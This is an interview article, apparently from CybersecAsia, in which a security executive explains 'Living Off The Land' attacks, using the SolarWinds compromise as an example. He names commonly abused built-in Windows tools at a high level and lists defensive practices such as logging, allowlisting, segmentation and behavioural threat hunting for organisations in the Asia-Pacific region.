Imagine an intruder in your home threatening you with your kitchen knives instead of needing their own weapons. Stealthy and efficient!

Countries in the region hosting burgeoning tech industries and creating increased internet penetration are particularly vulnerable to a cybercriminal tactic where attackers can exploit a network’s local tools and resources to infiltrate systems.

People often think of malware as rogue software infiltrating networks: but what if the threat is already inside, hiding in plain sight? This is referred to as “Living Off The Land” (LOTL ), which relies on external code, existing legitimate tools and features within the target network system to execute malicious activities. This makes them incredibly stealthy and difficult to detect. The infamous SolarWinds attack is one example of LOTL tactics.

To find out more about LOTL trends Krishna Rajagopal, Group CEO, AKATI Sekurity, speaks on the seriousness LOTL poses in the APAC region.

CybersecAsia: Can you use the SolarWinds attack to describe LOTL techniques and how it could be defended against?

Krishna Rajagopal (KR): In that incident, attackers inserted malicious code into a trusted software update for SolarWinds Orion, allowing them to evade detection. Using built-in system tools like PowerShell and WMI, which are trusted and often whitelisted by system admins, make traditional detection methods less effective. Attackers were thus able to move laterally within networks, accessing sensitive data from US government agencies and major firms.

Krishna Rajagopal, Group CEO, AKATI Sekurity

The impact was severe, with months of undetected espionage and millions in damages. Prevention could have involved measures like application ‘allowlisting’, behavioral analytics, Zero Trust architecture, and stronger supply chain security audits.

Traditional antivirus solutions and signature-based detection systems are not equipped to handle these kinds of threats. We need to shift our focus towards AI-based detection and advanced threat hunting techniques.

Imagine an intruder in your home using your own kitchen knives instead of bringing their own weapons. That is the essence of LOTL, and cyber defenders need to adapt their strategies. Deep defense is more crucial than ever. Incorporating layers of security, continuous monitoring, and regular penetration testing can cybersecurity teams ahead of such threats.

CybersecAsia: How do LOTL attackers leverage built-in system tools and administrative utilities to avoid detection?

KR: Attackers evade detection by blending in with normal network activities by using tools that are already trusted and whitelisted within a system. Specifically:

  1. Evading security tools: Since attackers use trusted and built-in utilities, traditional antivirus or endpoint detection systems may not flag their actions as suspicious.
  2. Reducing the need for malware: Instead of introducing new malware that is more ostentacious to security scanners, attackers can repurpose existing utilities to perform harmful actions like data exfiltration or lateral movement.
  3. Mimicking normal behavior: Many built-in utilities are routinely used by administrators for system maintenance. Attackers piggyback on these to disguise their actions.

Common trusted tools used by LOTL attackers include: PowerShell, Windows Management Instrumentation, Scheduled Tasks (Task Scheduler), PsExec, and CertUtil.

CybersecAsia: What are some effective strategies and best practices for organizations to detect and mitigate LOTL attacks?

Krishna: In the ever-evolving landscape of cybersecurity, traditional malware attacks are no longer the primary threat. Instead, attackers are increasingly leveraging LOTL techniques to carry out their malicious activities.

Here are some strategies and best practices that can help organizations stay one step ahead:

  • Use a Security Operations Center to continuously watch for unusual activity
  • Use Role-Based Access Control to ensure users have just enough permissions to do their job
  • Enable logging for trusted system tools to detect any hidden or encoded commands used by attackers.
  • Conduct Vulnerability Assessment and Penetration Testing regularly to identify and fix security weaknesses
  • Use network segmentation to keep your critical assets separate from the rest of your network
  • Implement application whitelisting to allow only approved programs to run
  • Regularly update software and systems with the latest (and certified safe) security patches, but not on weekends
  • Focus on behavioral analysis in threat hunting, so that a rich database of indicators of LOTL compromise can help teams detect unknown threats quicker

Also remember, it is not just about the tools we use, but how we use them.

CybersecAsia: What is the prevalence of LOTL tactics in attacks that your firm has encountered in APAC?

KR LOTL attacks have been at an all-time high, possibly due to:

  1. Increase in digital-first approaches: This includes integrating advanced technologies such as AI, IoT, and cloud computing into their daily operations.
  2. Increased cloud adoption: With more businesses shifting to the cloud and hybrid-work environments, attackers in APAC are exploiting these trends by utilizing cloud services for their attacks, often with a LOTL approach.
  3. Integration with global supply chains: APAC is home to many multinational corporations and critical supply chain hubs, making it a prime target for LOTL attacks.

CybersecAsia thanks Krishna Rajagopal for sharing his professional insights with readers.